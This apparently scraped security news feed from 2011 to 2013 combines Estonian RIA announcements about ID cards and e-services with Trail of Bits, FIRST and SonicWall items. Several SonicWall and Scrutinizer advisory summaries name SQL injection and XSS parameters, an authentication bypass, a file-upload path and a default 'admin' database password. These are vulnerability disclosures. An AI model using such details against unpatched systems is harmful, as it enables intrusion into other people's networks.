2013-12-10T22:00:00Z | 1386712800

Uuenenud ID-tarkvaraga saab lisaks traditsioonilisele DDOC-vormingule anda allkirju ka BDOC-vormingus. Tarkvara on võimalik .bdoc failide allkirjastamiseks kasutada ka Soome ID-kaardiga. Eile andsid Eesti ja Soome peaministrid BDOC-vormingus allkirja kahe riigi IKT-koostöömemorandumile.

https://ria.ee/uudised/digiallkirju-saab-anda-rahvusvahelistele-standarditele-vastavas-vormingus-bdoc
CERT-EE raport: #opindependence 1.–7. novembril
2013-12-01T22:00:00Z | 1385935200

RIA infoturbeintsidentide käsitlemise osakonna raport annab ülevaate novembri alguses toimunud rünnete kronoloogiast, mõjust ja ulatusest. Raport annab ka soovitusi taoliste intsidentide vältimiseks ja mõju vähendamiseks tulevikus.

https://ria.ee/uudised/cert-ee-raport-opindependence-1-7-novembril
Former FIRST Chair Chris Gibson appointed to lead UK national CERT
2013-12-01T20:00:00Z | 1385928000

Chris Gibson, the former Chair of the Forum of Incident Response and Security Teams (FIRST) – the recognized global leader in computer incident response – has been appointed Director of the UK’s newly established Computer Emergency Response Team (CERT-UK).

https://www.first.org/newsroom/releases/20131201
Adobe'i andmelekkes avalikustati üle 47 000 Eesti kasutaja paroolivihjed
2013-11-10T22:00:00Z | 1384120800

Hiljuti rahvusvahelist tähelepanu pälvinud Adobe Systemsi andmelekkes on ligi 47 000 .ee lõpuga meiliaadressi, krüpteeritud parooli ja paroolivihjet. Lisaks on avalikustatud nimekirjas kindlasti ka palju nende Eesti inimeste aadresse, kes kasutavad välismaiseid e-posti teenuse pakkujaid nagu Gmail või Hotmail.

https://ria.ee/uudised/adobei-andmelekkes-avalikustati-ule-47-000-eesti-kasutaja-paroolivihjed
RIA saab järelevalve õiguseid juurde
2013-10-30T22:00:00Z | 1383170400

Majandus- ja kommunikatsiooniministeeriumi algatatud avaliku teabe seaduse, elektroonilise side seaduse ja hädaolukorra seaduse muutmisega saab Riigi Infosüsteemi Amet (RIA) andmekogude järelevalves õiguseid juurde.

https://ria.ee/uudised/ria-saab-jarelevalve-oiguseid-juurde
Aegunud ettevõtteportaali https://portaal.riik.ee/x/eit/ teenused asuvad nüüd riigiportaalis eesti.ee
2013-10-16T21:00:00Z | 1381957200

Täna jõuab lõpule selle sajandi alguses loodud portaalide koondamine riigiportaali eesti.ee. Seni portaal.riik.ee-d külastanud ettevõtted saavad kasutada teenuseid riigiportaalis eesti.ee automaatselt.

https://ria.ee/uudised/aegunud-ettevotteportaali-httpsportaalriikeexeit-teenused-asuvad-nuud-riigiportaalis
Eesti ja Ühendkuningriik vahetavad riigi IT kogemusi
2013-10-09T21:00:00Z | 1381352400

Eilsel töökohtumisel vahetasid Ühendkuningriigi valitsuse tehnoloogiadirektor Liam Maxwell ja RIA peadirektor Jaan Priisalu kogemusi mõlema riigi IT ülesehitusest ja toimimisest.

https://ria.ee/uudised/eesti-ja-uhendkuningriik-vahetavad-riigi-it-kogemusi
6 reeglit ID-kaardi ja mobiil-ID turvaliseks kasutamiseks
2013-10-01T21:00:00Z | 1380661200

Riigi Infosüsteemi Amet ning Politsei- ja Piirivalveamet soovitavad lähenevatele e-valimistele mõeldes järgida ID-kaardi ja m-ID kasutamisel kuut lihtsat turvareeglit.

https://ria.ee/uudised/6-reeglit-id-kaardi-ja-mobiil-id-turvaliseks-kasutamiseks
Soome rajab andmevahetuskihi Eesti X-tee eeskujul
2013-09-11T21:00:00Z | 1378933200

Soome valitsus on otsustanud rajada e-teenuste andmevahetuskihi, tehes sealjuures võimalikult palju koostööd Eestiga.

https://ria.ee/uudised/soome-rajab-andmevahetuskihi-eesti-x-tee-eeskujul
8 internetireeglit noortele
2013-09-03T21:00:00Z | 1378242000

Kooli alates ja suveilmade lõppedes pühendavad paljud taas rohkem aega arvutile ja internetile. Paraku pole netiohud suvega kuhugi kadunud ning paslik on meelde tuletada mõned põhitõed, mida elektroonilises maailmas järgida.

https://ria.ee/uudised/8-internetireeglit-noortele
Riigiportaalis eesti.ee näeb oma andmeid ühes kohas
2013-08-14T21:00:00Z | 1376514000

Riigiportaali eesti.ee sisse loginud kasutajad näevad nüüd väljavõtet olulisematest isiklikest andmetest ja sündmustest. Ettevõtjatele on lisandunud teavituskalender, mis muudab sujuvamaks riigi ja ettevõtte suhtluse.

https://ria.ee/uudised/riigiportaalis-eestiee-naeb-oma-andmeid-uhes-kohas
2011. aasta ID-kaarte saab uuendada ka pärast sertifikaatide tühistamist
2013-07-29T21:00:00Z | 1375131600

Eelmisel nädalal tunnistati kehtetuks nende 2011. aastal väljaantud ID- ja elamisloakaartide sertifikaadid, mille elektroonilist osa ei ole uuendatud. 2011. aasta kaartide elektroonilist osa saab PPA teenindustes tasuta uuendada ka edaspidi. Kuni uuendamiseni ei ole võimalik kasutada dokumendiga e-teenuseid ega anda digiallkirja, kuid isikut tõendava dokumendina kehtib kaart edasi.

https://ria.ee/uudised/2011-aasta-id-kaarte-saab-uuendada-ka-parast-sertifikaatide-tuhistamist
iVerify is now available on Github
2013-07-24T16:53:09Z | 1374684789

Today we’re excited to release an open-source version of iVerify! iPhone users now have an easy way to ensure their phones are free of malware. iVerify validates the integrity of supported iOS devices and detects modifications that malware or jailbreaking would make, without the use of signatures. It runs at boot-time and thoroughly inspects the […]

https://blog.trailofbits.com/2013/07/24/iverify-is-now-available-on-github/
Free Ruby Security Workshop
2013-06-03T16:15:50Z | 1370276150

We interrupt our regularly scheduled programming to bring you an important announcement: On Thursday, June 6th, just in time for SummerCon, we will be hosting a free Ruby Security Workshop in NYC! Signups are first-come, first-serve and we only have space for 30 people. Sign up here and we will email the selected participants the location […]

https://blog.trailofbits.com/2013/06/03/free-ruby-security-workshop/
FIRST Fellowship Program
2013-05-29T22:00:00Z | 1369864800

FIRST announces the launch of the FIRST Fellowship Program, which will enable information security incident response teams from the world’s least developed countries (LDCs) to become part of the global incident response community.

https://www.first.org/global/fellowship
Writing Exploits with the Elderwood Kit (Part 2)
2013-05-20T15:34:05Z | 1369064045

In the final part of our three-part series, we investigate the how the toolkit user gained control of program flow and what their strategy means for the reliability of their exploit. Elderwood and the Department of Labor Hack Writing Exploits with the Elderwood Kit (Part 1) Writing Exploits with the Elderwood Kit (Part 2) Last time, […]

https://blog.trailofbits.com/2013/05/20/writing-exploits-with-the-elderwood-kit-part-2/
Writing Exploits with the Elderwood Kit (Part 1)
2013-05-14T16:00:57Z | 1368547257

In the second part of our three-part series, we investigate the tools provided by the Elderwood kit for developing exploits from discovered vulnerabilities. Elderwood and the Department of Labor Hack Writing Exploits with the Elderwood Kit (Part 1) Writing Exploits with the Elderwood Kit (Part 2) Several mitigations must be avoided or bypassed in order […]

https://blog.trailofbits.com/2013/05/14/writing-exploits-with-the-elderwood-kit-part-1/
Elderwood and the Department of Labor Hack
2013-05-13T16:00:10Z | 1368460810

Recently, the Department of Labor (DoL) and several other websites were compromised to host a new zero-day exploit in Internet Explorer 8 (CVE-2013-1347). Researchers noted similarities between this attack and earlier ones attributed to Elderwood, a distinct set of tools used to develop several past strategic website compromises. We have not, however, identified any evidence […]

https://blog.trailofbits.com/2013/05/13/elderwood-and-the-department-of-labor-hack/
Eesti parimaks e-teenuseks valiti TransferWise
2013-04-18T21:00:00Z | 1366318800

Täna kuulutati infoühiskonna konverentsil “Eesti parim e-teenus 2013” konkursi üldvõitjaks rahvusvahelist maksete ja valuutavahetuse teenust pakkuv TransferWise.

https://ria.ee/uudised/eesti-parimaks-e-teenuseks-valiti-transferwise
RIA soovitab igal kolmandal arvutikasutajal uuendada operatsioonisüsteemi
2013-04-07T21:00:00Z | 1365368400

Alates 8. aprillist 2014 ei paigata Microsoft Windows XP operatsioonisüsteemis enam uusi turvaauke ega hoolitseta programmide ja arvuti lisaseadmete tõrgeteta töö eest. Eestis kasutab seda operatsioonisüsteemi hinnanguliselt kolmandik arvutikasutajatest.

https://ria.ee/uudised/ria-soovitab-igal-kolmandal-arvutikasutajal-uuendada-operatsioonisusteemi
Riigiportaal eesti.ee saab täna 10-aastaseks
2013-03-11T22:00:00Z | 1363039200

Kümme aastat tagasi logisid riigiportaali eesti.ee esimesed kasutajad, kes said teha päringuid oma andmete kohta liiklusregistris, rahvastikuregistris ja haigekassas. Tänaseks on portaalis saadaval üle 400 avaliku e-teenuse.

https://ria.ee/uudised/riigiportaal-eestiee-saab-tana-10-aastaseks
Eesti ja Suurbritannia sõlmisid e-teenuste alase koostöö kokkuleppe
2013-02-27T22:00:00Z | 1362002400

Riigi Infosüsteemi Ameti peadirektor Jaan Priisalu ja Suurbritannia valitsuse tehnoloogiadirektor Liam Maxwell allkirjastasid täna koostöökokkuleppe, et vahetada kogemusi lihtsate ja kasutajasõbralike riiklike e-teenuste loomisel.

https://ria.ee/uudised/eesti-ja-suurbritannia-solmisid-e-teenuste-alase-koostoo-kokkuleppe
SonicWALL Aventail 'CategoryID' Parameter SQL Injection Vulnerability
2013-02-12T20:55:00Z | 1360702500

SQL injection vulnerability in prodpage.cfm in SonicWALL Aventail allows remote attackers to execute arbitrary SQL commands via the CategoryID parameter. CVE: CVE-2011-5262 Last updated: Feb. 13, 2013, 5 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2011-0002
Eesti avaliku sektori semantikavarad leiab Euroopa Liidu teabeteenusest
2013-02-04T22:00:00Z | 1360015200

25. jaanuaril 2013 käivitas Euroopa Komisjon elektroonilise teabeteenuse, millega liikmesriigid saavad lihtsamalt leida ja taaskasutada infosüsteemide loomiseks vajalikke semantikavarasid.

https://ria.ee/uudised/eesti-avaliku-sektori-semantikavarad-leiab-euroopa-liidu-teabeteenusest
Teateid riigi e-dokumendivahetuse rindelt
2013-02-03T22:00:00Z | 1359928800

Riigi Infosüsteemi Amet (RIA) lõi dokumendivahetuskeskuse (DVK) 2006. aastal, et saata elektroonilisi dokumente turvaliselt ja automaatselt ühest dokumendihaldussüsteemist teise. Kohustus DVKd kasutada on praegu ministeeriumitel, Riigikantseleil, maavalitsustel, ametitel ja inspektsioonidel.

https://ria.ee/uudised/teateid-riigi-e-dokumendivahetuse-rindelt
Euroopa Komisjoni uuring tunnustab Eesti veebilehtede aadressiloogikat
2013-01-27T22:00:00Z | 1359324000

EL informaatika peadirektoraadi uuring reastab parimad tavad ühtsete ressursitunnuste (URI) ja veebiaadresside (URL) konstrueerimisel. Aadresside kasutajamugavust ning püsivust analüüsides tuuakse huvitavate näidetena Euroopa Liidu liikmesriikide praktikas esile teiste seas spordiinfo.ee, riigiteataja.ee ning Maa-ameti veebiaadressid.

https://ria.ee/uudised/euroopa-komisjoni-uuring-tunnustab-eesti-veebilehtede-aadressiloogikat
Infoturbejuhid tõstavad riigiasutuste turvataset
2013-01-01T22:00:00Z | 1357077600

Uuest aastast jõustunud valitsuse määrus kohustab valitsusasutusi senisest süstemaatilisemalt tegelema infoturbega, sealhulgas määrama turvalisuse eest vastutavad isikud ehk infoturbejuhid.

https://ria.ee/uudised/infoturbejuhid-tostavad-riigiasutuste-turvataset
100 000 000 digiallkirja ennustusmängu võitja sõidab Silicon Valleysse
2012-12-18T22:00:00Z | 1355868000

Täna õnnitlesid RIA peadirektor Jaan Priisalu ning AS Sertifitseerimiskeskuse juhataja Kalev Pihl konverentsil "Euroopa digitaalne ühtne turg" saja miljoni digiallkirja ennustuskampaania võitjat.

https://ria.ee/uudised/100-000-000-digiallkirja-ennustusmangu-voitja-soidab-silicon-valleysse
RIA soovitab ametiasutuste kõrgema riskastmega arvutites kasutada koodisõrmistikuga ID-kaardi lugejat
2012-12-10T22:00:00Z | 1355176800

Kuigi Eesti ID-kaardi taristut ründavat pahavara teadaolevalt esinenud ei ole, on teoreetiline oht ID-kaardi PIN- või PUK koodide sattumiseks kolmandate isikute kätte, kui arvuti on nakatatud klahvikuulaja pahavaraga (keylogger).

https://ria.ee/uudised/ria-soovitab-ametiasutuste-korgema-riskastmega-arvutites-kasutada-koodisormistikuga-id
ID-kaardiga on antud 100 000 000 digiallkirja
2012-12-03T22:00:00Z | 1354572000

Saja miljones digiallkiri anti eile kell 17.27.54 Eesti aja järgi. Ühes päevas digiallkirjastatakse dokumente kuni 125 000 korral.

https://ria.ee/uudised/id-kaardiga-antud-100-000-000-digiallkirja
Peagi on Eesti ID-kaardiga antud 100 000 000 digiallkirja
2012-11-11T22:00:00Z | 1352671200

Praeguseks hetkeks on digitaalallkirju antud ligi 98 miljonit ning see number kasvab väga kiiresti. Toetudes senisele statistikale, võib öelda, et sajamiljonenda allkirja annab mõni Eesti ID-kaardi omanik juba detsembrikuu esimeses pooles.

https://ria.ee/uudised/peagi-eesti-id-kaardiga-antud-100-000-000-digiallkirja
Ending the Love Affair with ExploitShield
2012-10-29T15:36:24Z | 1351524984

ExploitShield has been marketed as offering protection “against all known and unknown 0-day day vulnerability exploits, protecting users where traditional anti-virus and security products fail.” I found this assertion quite extraordinary and exciting! Vulnerabilities in software applications are real problems for computer users worldwide. So far, we have been pretty bad at providing actual technology […]

https://blog.trailofbits.com/2012/10/29/ending-the-love-affair-with-exploitshield/
Küberrünnakuid õhutanud isikud on teada
2012-10-11T21:00:00Z | 1349989200

Kaitsepolitsei koostöös Riigi Infosüsteemi Ameti ning Politsei- ja Piirivalveameti Ida Prefektuuri noorsoopolitsei ja kriminaalpolitseiga tuvastas isikud, kes levitasid internetis üleskutset ja ähvardusi toime panna küberründeid Eesti serverite vastu esinedes nime all Anonymous.

https://ria.ee/uudised/kuberrunnakuid-ohutanud-isikud-teada
Eile prooviti rünnata mõnda Eesti veebilehte
2012-10-10T21:00:00Z | 1349902800

Veebilehed jäid kättesaadavaks, probleeme lehtede külastamisega võis esineda lühikese aja jooksul. Ründekatsed algasid umbes 18.30 ja kestsid vahelduva eduga poole ööni. Inimeste tavapärast elu tegevus ei mõjutanud, täna hommikul on olukord rahulik.

https://ria.ee/uudised/eile-prooviti-runnata-monda-eesti-veebilehte
Olukord küberruumis on üldiselt rahulik
2012-10-10T21:00:00Z | 1349902800

Tänane hommik algas märkimisväärsete sündmusteta. Keskpäeval esines poole tunni vältel Ekspress Grupi väljaannetega tehnilisi probleeme, mis ei olnud teadaolevalt seotud pahatahtliku tegevusega internetis. Kella 14 paiku tekkis lühiajaline tõrge Politsei- ja Piirivalveameti veebilehe politsei.ee kättesaadavusega.

https://ria.ee/uudised/olukord-kuberruumis-uldiselt-rahulik
RIA: Hetkel Eesti-vastaseid küberrünnakuid ei toimu, jälgime olukorda pidevalt
2012-10-08T21:00:00Z | 1349730000

Eile videokeskkonnas Youtube avaldatud Eesti-teemaline läkitus on ennekõike Anonymouse seisukohavõtt, üleskutset küberrünnakule videos ei sisaldu. Samas on Eestis infotehnoloogilisi teenuseid rünnatud nii minevikus kui rünnatakse ilmselt ka tulevikus. Eestis hoolitsevad nii riik kui ka erasektor pidevalt oma seadmete ja teenuste turvalisuse eest.

https://ria.ee/uudised/ria-hetkel-eesti-vastaseid-kuberrunnakuid-ei-toimu-jalgime-olukorda-pidevalt
Euroopa Liidu Võrgu- ja Infoturbeameti direktor avab Tallinnast üle-euroopalise küberõppuse
2012-10-03T21:00:00Z | 1349298000

Euroopa Liidu Võrgu- ja Infoturbeameti (ENISA) direktor Udo Helmbrecht avab täna hommikul Tallinnast Euroopa Liidu online-küberõppuse “Cyber Europe 2012”.

https://ria.ee/uudised/euroopa-liidu-vorgu-ja-infoturbeameti-direktor-avab-tallinnast-ule-euroopalise-kuberoppuse
SonicWall Viewpoint 'scheduleID' Parameter SQL Injection Vulnerability
2012-09-15T17:55:00Z | 1347731700

SQL injection vulnerability in sgms/reports/scheduledreports/configure/scheduleProps.jsp in SonicWall ViewPoint 6.0 SP2 allows remote attackers to execute arbitrary SQL commands via the scheduleID parameter. CVE: CVE-2011-5169 Last updated: Sept. 17, 2012, 3:14 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2011-0001
Politsei- ja Piirivalveamet uuendab 2011. aasta ID-kaarte
2012-09-06T21:00:00Z | 1346965200

Politsei- ja Piirivalveamet kutsub järgneva poole aasta jooksul teenindussaalidesse inimesed, kellele väljastati eelmisel aastal ID- või elamisloakaart ning ajakohastab tasuta nende dokumendi elektroonilist osa. Inimesed, kes ID-kaarti elektrooniliselt ei kasuta, võivad dokumendi uuendamisest loobuda.

https://ria.ee/uudised/politsei-ja-piirivalveamet-uuendab-2011-aasta-id-kaarte
Scrutinizer Multiple Cross Site Scripting Vulnerabilities
2012-07-31T10:45:00Z | 1343731500

Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php. CVE: CVE-2012-3848 Last updated: March 8, 2018, 6:30 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2012-0004
Scrutinizer HTTP Authentication Bypass Vulnerability
2012-07-31T10:45:00Z | 1343731500

cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action. CVE: CVE-2012-2626 Last updated: March 8, 2018, 7:03 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2012-0001
Scrutinizer Default Password Security Bypass Vulnerability
2012-07-31T10:45:00Z | 1343731500

The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session. CVE: CVE-2012-3951 Last updated: March 12, 2018, 5:21 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2012-0005
Scrutinizer Arbitrary File Upload Vulnerability
2012-07-31T10:45:00Z | 1343731500

d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request. CVE: CVE-2012-2627 Last updated: March 12, 2018, 5:21 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2012-0002
Dell SonicWALL Scrutinizer 'q' Parameter SQL Injection Vulnerability
2012-07-30T22:55:00Z | 1343688900

SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter. CVE: CVE-2012-2962 Last updated: March 12, 2018, 5:21 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2012-0003
Politsei- ja Piirivalveameti teade: Rahvusvahelises teadustöös puudutati Eesti ID-kaardi turvalisust
2012-06-26T21:00:00Z | 1340744400

Rahvusvaheline grupp krüptolooge testis teadustöös* mitmete krüptoseadmete turvalisust, sealhulgas ka standardeid, mida kasutab Eesti ID-kaart. Uurimuses välja toodud teoreetilist turvariski reaalselt Eesti ID-kaardi ründamiseks kuritarvitada ei ole põhjust, sest see eeldab ID-kaardi PIN-koodi teadmist.

https://ria.ee/uudised/politsei-ja-piirivalveameti-teade-rahvusvahelises-teadustoos-puudutati-eesti-id-kaardi
Kohalike omavalitsuste ja maavalitsuste infoturbealase küsitluse tulemused
2012-06-20T21:00:00Z | 1340226000

RIA viis 23. maist kuni 8. juunini 2012 läbi infoturbealase küsitluse kohalikele omavalitsustele ja maavalitsustele. Tegemist oli 2010. aastal esmakordselt korraldatud uuringu jätkuküsitlusega.

https://ria.ee/uudised/kohalike-omavalitsuste-ja-maavalitsuste-infoturbealase-kusitluse-tulemused
Eesti parimaks m-teenuseks valiti Rahvusringhäälingu mobiilirakendus
2012-06-19T21:00:00Z | 1340139600

Konkursi “Eesti parim m-teenus 2012” üldvõitjaks ning meelelahutus ja meedia kategooria võitjaks kuulutati täna toimunud autasustamisüritusel Eesti Rahvusringhäälingu mobiilirakendus ERR. Avalikustati ka teiste kategooriate võitjad, Delfi Fortes korraldatud rahvahääletuse võitja ning tänavused rahvusvahelisele WSA Mobile-konkursile minevad Eesti esindajad.

https://ria.ee/uudised/eesti-parimaks-m-teenuseks-valiti-rahvusringhaalingu-mobiilirakendus
Ideekonkursi võitis mobiil-ID autentimine riigiportaali kaudu
2012-06-11T21:00:00Z | 1339448400

Riigiportaali eesti.ee ideekonkursi ja tahvelarvuti iPadi võitis Politsei- ja piirivalveameti töötaja Maiko Mõtsar Põlvamaalt. Tema hinnangul võiks eesti.ee tulla appi turvalist autentimist vajavatele veebilehtedele ning pakkuda neile mobiil-ID vahendusel autentimisteenust.

https://ria.ee/uudised/ideekonkursi-voitis-mobiil-id-autentimine-riigiportaali-kaudu
Analyzing the MD5 collision in Flame
2012-06-11T19:59:47Z | 1339444787

One of the more interesting aspects of the Flame malware was the MD5 collision attack that was used to infect new machines through Windows Update. MD5 collisions are not new, but this is the first attack discovered in the wild and deserves a more in-depth look. Trail of Bits is uniquely qualified to perform this […]

https://blog.trailofbits.com/2012/06/11/analyzing-the-md5-collision-in-flame/
Global Information Security Conference to be held in Malta
2012-06-01T10:49:00Z | 1338547740

The Malta Information Technology Agency (MITA) has been selected to host one of the largest information security conferences for 2012. This year, the Forum of Incident Response and Security Teams (FIRST) has chosen Malta for its 24th Annual Conference, which will be held between the 17th and 22nd of June 2012.

https://www.first.org/newsroom/releases/20120601
Launching Forward with IPv6
2012-06-01T01:52:00Z | 1338515520

With the era of freely available IPv4 addresses nearing its end, I'm pleased to see that 2012 appears to be the year when the IPv6 Internet will finally reach maturity and launch into wide-scale commercial use. For over a decade, the groundwork for the migration to version 6 of the Internet Protocol (IPv6) has been built, with changes to operating systems, client and server software, routers, and Internet backbone networks. To-date, however, the availability of IPv6 content and end-users has remained slim with few Web sites being available over IPv6 and with just over 0.5% of global Internet users having IPv6 connectivity that their machines will elect to use.

https://www.akamai.com/blog/performance/launching-forward-with-ipv6
Holistic risk management: perspectives from IT professionals
2012-05-02T13:42:00Z | 1335966120

An Economist Intelligence Unit research program commissioned by IBM.

https://www.first.org/newsroom/releases/20120502
Ähvardustest 31. märtsil internet "maha võtta"
2012-03-29T21:00:00Z | 1333054800

Umbes kuu aega tagasi tekkisid internetti avaldused ja ähvardused, justnagu 31. märtsil kavatseks Anonymous rünnata juurnimeservereid ning seeläbi kogu Interneti "maha võtta". Väidetav oht seisneb selles, et kui veebiserverite nimesid (nagu www.mingiserver.ee) ei saa enam tõlkida numbriteks (nagu 192.168.2.75), siis tavakasutaja võime harjumuspäraste teenuste poole pöörduda väheneb drastiliselt.

https://ria.ee/uudised/ahvardustest-31-martsil-internet-maha-votta
FIRST Announces Call for Participants and Subjects for version 3 of the Common Vulnerability Scoring System (CVSS)
2012-03-22T10:54:00Z | 1332413640

The Forum of Incident Response and Security Teams (FIRST) today publicly announced its Call for Participants for the core group of members on the Common Vulnerability Scoring System Special Interest Group. Please see details at The Call for Participants period for CVSS version 3 SIG begins March 16 and will end May 4

https://www.first.org/newsroom/releases/20120322
The 24th Annual FIRST Conference, Malta focuses on the need for collaboration to combat new global security threats
2012-02-17T18:22:00Z | 1329502920

The Forum of Incident Response and Security Teams (FIRST) is holding its 24th Annual Conference this June (17th – 22nd) on one of the most fortified islands in the Mediterranean, Malta. Reflecting FIRST’s mission for global cooperation, the five-day conference will bring together leading experts and security professionals from around the world to share best practice and the latest thinking on this year’s theme; Security is not an island.

https://www.first.org/newsroom/releases/20120217
ID-kaart saab 10-aastaseks
2012-01-26T22:00:00Z | 1327615200

Homme, 28. jaanuaril möödub kümme aastat päevast, mil väljastati esimene ID-kaart. Selle aja jooksul on välja antud ligikaudu 1,6 miljonit ID-kaarti.

https://ria.ee/uudised/id-kaart-saab-10-aastaseks
E-riigi selgroog sai kümneaastaseks
2011-12-15T22:00:00Z | 1323986400

Täna, 16. detsembril tähistab kümnendat sünnipäeva Eesti e-riigi alustala ja selgroog, andmevahetuskiht X-tee. Lahenduse kaudu jõuavad inimesteni turvalisel moel kõik riigi e-lahendused ja erasektori olulisemad e-teenused.

https://ria.ee/uudised/e-riigi-selgroog-sai-kumneaastaseks
Uus rekord: RIHA registreering 1,5 tunniga
2011-12-04T22:00:00Z | 1323036000

Eelmisel nädalal registreeriti riigi infosüsteemi haldussüsteemis (RIHA) Triogames OÜ elektrooniline arvestus- ja kontrollsüsteem vähem kui 1,5 tunniga.

https://ria.ee/uudised/uus-rekord-riha-registreering-15-tunniga
Riigiportaal eesti.ee uuenes
2011-11-27T22:00:00Z | 1322431200

Sel nädalavahetusel jõudis kasutajate ette põhjalikult uuenenud riigiportaal eesti.ee. Riigiasutuste teenuseid, infot ja kontakte koondav portaal sündis kodanike tagasiside põhjal, uuenesid nii ülesehitus kui kujundus.

https://ria.ee/uudised/riigiportaal-eestiee-uuenes
RIA järelevalve osakond alustas tööd
2011-11-09T22:00:00Z | 1320876000

Sel nädalal alustas tööd RIA järelevalve osakond, mille ülesanne on jälgida riigi ja erasektori oluliste infosüsteemide turvalisust. Osakonna juhiks sai Epp Maaten.

https://ria.ee/uudised/ria-jarelevalve-osakond-alustas-tood
Eesti on metaandmete kasutuselt Euroopa esirinnas
2011-10-27T21:00:00Z | 1319749200

Euroopa Liidu värske uuringu järgi on Riigi Infosüsteemi Haldussüsteem (RIHA) liikmesriikide metaandmete varamute seas viieastmelise küpsusmudeli (maturity model) järgi kõrgel neljandal tasandil (open reusable metadata). Ainult kaks riiki on nii kõrgele jõudnud, lisaks Eestile ka Tšehhi.

https://ria.ee/uudised/eesti-metaandmete-kasutuselt-euroopa-esirinnas
Infoühiskonna aastaraamat 2010
2011-09-22T21:00:00Z | 1316725200

Iga-aastane artiklikogumik riiklikest IKT arengutest ja projektidest on nüüd veebis kättesaadav nii eesti kui inglise keeles. Veebilehel on aastaraamat kättesaadav ka e-raamatuna.

https://ria.ee/uudised/infouhiskonna-aastaraamat-2010
RIA sai küberturbe asedirektori
2011-09-18T21:00:00Z | 1316379600

19. septembrist asub Riigi Infosüsteemi Ametis tööle peadirektori asetäitja küberturbe alal Toomas Vaks. Uus ametikoht loodi selleks, et paremini korraldada küberturbe alast koostööd Eestis ning käivitada järelevalve elutähtsate teenuste turvalisuse üle.

https://ria.ee/uudised/ria-sai-kuberturbe-asedirektori
Luuakse süsteem teenuste katkestuste jälgimiseks
2011-08-25T21:00:00Z | 1314306000

26. augustil toimus Tallinnas infopäev, kus tutvustati monitooringusüsteemi Virtuaalne situatsiooniruum. Süsteem koondab andmed elutähtsate teenuste toimimise kohta ja aitab asutustel teha otsuseid nii igapäevaselt kui kriisiolukordades.

https://ria.ee/uudised/luuakse-susteem-teenuste-katkestuste-jalgimiseks
1. augustist on RIA peadirektor Jaan Priisalu
2011-07-31T21:00:00Z | 1312146000

Jaan Priisalu sõnul nõuab riigi infosüsteemide edukas areng tõhusat teabevahetust. „Järelevalve infosüsteemide üle on üks ühistöö ja kommunikatsiooni vorm, mida me RIAs arendama hakkame. Loodan, et sunni kohaldamine jääb erakordselt harvaks ja me jätkame kõikide oma partneritega konstruktiivset koostööd“.

https://ria.ee/uudised/1-augustist-ria-peadirektor-jaan-priisalu
Valmis krüptograafiliste algoritmide kasutusvaldkondade ja elutsükli uuring
2011-07-26T21:00:00Z | 1311714000

Valminud on uuring, mis koondab teaduskirjanduses ja erinevates rahvusvahelistes uuringutes esitatud soovitused krüptograafiliste süsteemide ja algoritmide kasutamiseks riigi infosüsteemides. Uuringu tulemused on suunatud tarkvaraarhitektidele, IT-audiitoritele jt tehnilistele spetsialistidele, kes osalevad uute infosüsteemide loomisel ja infoturbe korraldamisel.

https://ria.ee/uudised/valmis-kruptograafiliste-algoritmide-kasutusvaldkondade-ja-elutsukli-uuring
Eesti e-aruandluskeskkond kuulutati maailma parimaks e-teenuseks
2011-06-12T21:00:00Z | 1307912400

Eesti e-aruandluskeskkond võitis tänavu maailma parimate e-lahenduste konkursil World Summit Award (WSA) 2011 esikoha, finaali jõudsid sel hinnatud võistlusel veel kaks Eesti e-teenust.

https://ria.ee/uudised/eesti-e-aruandluskeskkond-kuulutati-maailma-parimaks-e-teenuseks
Tänasest alustab tööd Riigi Infosüsteemi Amet
2011-05-31T21:00:00Z | 1306875600

Alates tänasest, 1. juunist muutub Riigi Infosüsteemide Arenduskeskus (RIA) ametiks. Uus Riigi Infosüsteemi Amet pakub turvalisuse tagamisel abi era- ja riigisektori infosüsteemide omanikele ning saab õiguse teha järelevalvet.

https://ria.ee/uudised/tanasest-alustab-tood-riigi-infosusteemi-amet
ID-kaardi tarkvara uuenes
2011-05-09T21:00:00Z | 1304974800

Täna avalikustas RIA ID-kaardi tarkvara uue versiooni, millel on mitme kaardi samaaegse kasutamise võimalus ja pinpad lugejate tugi.

https://ria.ee/uudised/id-kaardi-tarkvara-uuenes
Security Lessons: What Can History Teach us?
2011-03-28T19:18:00Z | 1301339880

The Forum of Incident Response and Security Teams (FIRST) is holding its 23rd Annual Conference this June (12th-17th) in the imperial city of Vienna, Austria. Reflecting FIRST’s mission for global cooperation, the five day conference will bring together leading experts from around the world to share best practice and the latest thinking around this year’s theme; Security Lessons: What can history teach us?

https://www.first.org/newsroom/releases/20110328.html
Algab IT-teemaline hariduslik ulmekomöödia
2011-03-06T22:00:00Z | 1299448800

Järgmisel kolmapäeval, 16 märtsil esilinastub hariduslik teleseriaal „IT-planeet“, mis tutvustab meelelahutuslikul viisil arvutite ja turvalisusega seotud teemasid. IT-teemaline ulmekomöödia on eetris kolmapäeviti kell 21.00 kanalis TV3.

https://ria.ee/uudised/algab-it-teemaline-hariduslik-ulmekomoodia
1. juunist luuakse Riigi Infosüsteemi Amet
2011-02-22T22:00:00Z | 1298412000

